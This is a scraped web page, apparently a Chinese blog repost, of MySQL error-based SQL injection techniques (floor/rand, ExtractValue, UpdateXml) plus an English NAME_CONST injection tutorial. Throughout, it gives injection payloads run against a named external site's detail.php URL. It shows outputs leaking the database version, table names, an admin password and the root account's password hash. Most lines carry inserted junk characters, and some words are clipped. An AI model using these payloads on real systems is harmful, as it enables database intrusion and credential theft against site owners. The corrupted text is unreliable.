|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:- y! r( q; `' o+ e2 f0 q
首先进行正常查询: mysql> select * from article where id = 1;
3 d7 L9 z/ [$ U+—-+——-+———+) Q) C( t. i( v+ o# e+ v6 L
| id | title | content |4 D* x* D. j4 @: Y; F# i
+—-+——-+———+
! J( \: v. g/ ]6 A! W| 1 | test | do it |
( U0 ~; r ^+ U+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; [3 _9 I2 v. p$ u, JERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
9 w, g6 d6 V2 ?) l9 D) T例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);) |0 U, H) F% z; O' L" J
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
# k. @$ F# }; l6 u+ g! oERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
6 p1 C( A5 L- a$ f测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& O; ^7 M0 U' W5 v
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
( K2 x4 ~0 V) b' M. Z, U% {+ x7 y" o1 Q
再收集:
! D, o7 i7 ]3 S! F% V% shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ' S* Y1 \7 E2 w
3 k, [* G% t$ d% s1 pError uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’8 g4 ^ O& N6 i% q- F% X1 G7 U
G* n/ M4 e3 {http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 r7 a+ ^) ]9 X2 ^4 _( P
; u% ] j: N8 X& i+ s4 P& U4 O* zError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 C+ \& l9 x9 ^" ]: L, D5 o
9 S# G2 L a; m- p5 U" \' bMYSQL高版本报错注入技巧-利用NAME_CONST注入
4 r h5 _+ |& g! [It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
- K) F% x; E2 ?5 N+ ]% z
* S: X5 G# \& L+ F% G0 G1 q( I0 ]
相关信息
$ a6 ~( m) `/ `7 ~( e5 i
6 e& @+ q. ^* e) F/ a' k- @3 Z1 P) aNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
" j7 u7 ^* i. U" \
4 W: r$ j5 I3 M6 B, m& @. d4 f* bCode:
$ W: ~' l8 \4 a- T) m% o* k6 XNAME_CONST(DATA, VALUE)! e& Q& S1 f! M$ K, F8 E
" ] z) I& _* Z; `5 h9 l4 {
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.$ k: B" L0 p" B& L" ^
, y* H$ _' t: A% z; S4 ]SELECT NAME_CONST('TEST', 1)
0 F; P. c a' Q! }3 |- c# J$ h( [( O) w& ?( h
: \0 x' _8 F- ]. g9 N* P8 |
* t, _" c, j& [% x7 |- ~8 B|---------------|* j' T: w. T, a( B+ Y' f
| TEST |
7 \1 f9 i8 x7 z, I' O0 Y| |
' n8 K- s2 _$ `$ L! \|---------------|5 d) P8 U* w1 p) \( O
| 1 |6 S0 B2 O: k$ L1 v2 \
| |
# n" m! p; ^+ k0 S/ A! v6 R|---------------|) h. v5 K5 V6 h" b" s
2 c. H7 l) r7 ]$ A. ^
4 T R2 U; e! e6 M ^5 ~( r) v
; s m8 |* h U( `( n2 @: k
, g! b- R6 z" hhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const% E9 k B4 @- x0 A' g
Intro to MySQL Variables
2 s9 D. D+ I) u7 A1 O2 O4 q$ k
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.! j' K+ T3 j* o3 Q* _! d
5 Q( y1 d( g# x; K: c, }! z0 W. s) ?
Code:+ c; D* X- \+ m9 r( r
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261! F: V9 t$ ?3 g! r/ g8 ]+ y8 E) P
/ Q1 u- e, P) f8 c1 }, L' A1 n; K4 J" J6 O& {# P* i& O
7 X( r9 c \! V. O2 G* z- t9 i! r: z$ x
2 c( b( s" q2 V# j& V( K+ h
% b+ }+ Y1 n4 t, Z c4 B [Code:2 i/ M; Q; T( e' t n6 [: F1 @
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--3 x- f, u% m9 K$ ^- }
$ c1 N' s0 G! e8 p7 _' Y) Y q( ^& N' o
VAR = Your MySQL variable.
. F0 o' ^1 l% f, c- v. c. R
6 _0 y$ f; D* g$ k/ x4 P, D6 jMySQL 5.1.3 Server System Variables
# d) ~# }( j! U
: d0 p- I) e4 h1 x. K) ^Let's try it out on my site..) O, |/ o& g. H, H) c; `8 K
- |/ b; n: i* ~* H
Code:; i" b. {+ q2 a0 E2 w; w8 M5 L' T
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--( o, s- \! \. u) G
6 W( \7 f+ Y" o+ oError uplicate column name '5.0.27-community-nt'
4 g" V5 b& b8 J' m3 k0 R: I
6 h4 X# v# E [0 U& D3 \; S% I! U$ b7 p; y
9 \% M+ {. x5 U& `2 t1 S0 H
. o3 z( G% P$ S, N; L7 H+ @
: E5 {- C- T" v% w) iNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
e& j. Z: m ~6 [1 H9 t2 K4 _% N6 f [: q' ?
Data Extraction1 t- a1 |! a L0 V0 ]4 M
: `3 a. w5 A9 x; o% o% w
Code:8 N& R/ y' M- }0 v4 m) w; L1 D
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--, E2 T! l6 N+ J' T+ d
+ U- P3 N* O, E" n) z
- I: ?) z2 ?) \" Y2 o. I% \We should get a duplicate column 1 error...$ n& J1 J: d& w5 M! n* H
" ^3 G# ]0 Z" L) O5 U+ z3 zCode:; e5 s! r1 ~' o3 _! O+ `
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--: [+ A) f0 X. @8 _6 {
2 C8 |1 c7 y5 Q" e& u8 ^8 E+ V
Error uplicate column name '18 Z$ J7 g5 I( f5 d- Q
; s( y+ C" L2 w; ]/ u0 N' W4 [; z V
6 ]8 k; Q8 @7 h; s5 ~& M. C2 i& e6 |! z: E8 \/ [* h
7 @9 A2 k2 ]; ^
$ T7 f: e( x: A, U9 s
, L# `$ u: {5 ]$ i1 V" J
Now let's get the tables out this bitch..
6 I' h. g, B+ N7 ~1 U- ^2 D0 i5 A3 I5 U1 R! w
Code:- D4 |9 y: @' R j' i, B" R
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--* k- p! P$ N4 J4 u e3 w
+ R s2 S Q9 P$ r# X% V. g9 n7 J; w
: [) X% ]# w0 Z1 |4 I2 N/ s
Let's see if it works here, if it does, we can go on and finish the job.4 E: k* t: x) u! h0 |
( L6 ?6 E* C) z! I! X, z: K
Code:, v2 m# G) x: q1 x. L5 U
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% l" [& q6 M! l$ S) H
# ^, P, D6 E v7 q
5 ?' H* x1 ^' k4 J8 tError uplicate column name 'com_admanage
% i% ]! J( C2 D% n Q- t
( v4 w8 I/ V+ G0 O$ `* [; r7 [
% @$ l/ l F& ~! c
- O/ Y3 O. r" ~1 Y% X( ]
9 l3 C+ n. K& U3 d4 _" c. c" ~( N
; O' X; P* D! n. O( {9 ~' z+ V( A
+ ~2 P# | {4 k8 g$ y0 z q. HNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
! e& y$ Y6 l4 {8 J8 | {
' d3 W. [1 }) K& s. PLet's get the columns out of the user table..
Z9 ~* U% c1 ]" `# L2 u/ ?8 _9 o* E5 {4 n' P9 }
Code:
/ V# |& d7 U& _8 m0 ^5 |+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--8 r& p- X- N$ L& U' C! R4 d
5 |0 C% l. \' t( ^
: G; W# W$ o3 |- ^0 ISo mine looks like this, and I get the duplicate column name 'Host'.8 e8 O5 z+ a$ o4 N% Z. Q* Q
4 C( ~. f: o6 D, z& B, Z! \
Code:
3 n7 C6 @; e/ m# z, G( q6 `, fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--4 U9 D- n8 s* J$ Q
6 O3 t0 N a$ FError uplicate column name 'Host'
, t- A' x: M& R' |- b$ O. u* c2 I# l
/ z. x# @7 w! I/ r; K( K+ B5 B6 S
; n: m# a J! [% v) T
+ G7 I& I; ]2 k( q) d$ f$ [7 q* L0 ]* n4 v
- P/ f r- c' U5 k0 c3 c7 C( \' }, G" t+ x y* l' q$ ]
Woot, time to finish this bitch off.
* C9 H; [2 N8 _
, \% D/ s4 g( q( Q( i7 ECode:
& w" I. ?6 H. B& p- Q @+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--% _ U. x, c& \% D% u
+ ~- i! {; R/ L, ~" V4 @: P* K
% z# m; |8 D9 R. A+ W5 i C
So mine looks like this...1 o p8 f- G! g: b# m0 r
8 N5 ?8 d( F. q0 g" j Z1 [$ w! O
Code:
& f$ T4 R, {$ ~/ G3 T( F5 Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
0 X" J+ {- i2 N7 ~6 J9 q
8 i% c0 U# a* K0 T. DError uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 f; | {, U; V# _) `4 y [1 o. c& H( f8 R
3 I7 z7 B. v& G' N6 T: f/ |
& e! Q) b0 e, r+ G0 t6 c0 \. j/ j1 P
" `8 C, D/ T+ h
0 x. C: K& ~' f: G2 B [7 l2 q
8 }: v: f1 L, A4 X2 D4 x1 tAnd there we have it, thanks for reading.3 S, W# c5 U. n, P9 G
, A& p; R8 I# X% E. ?9 d |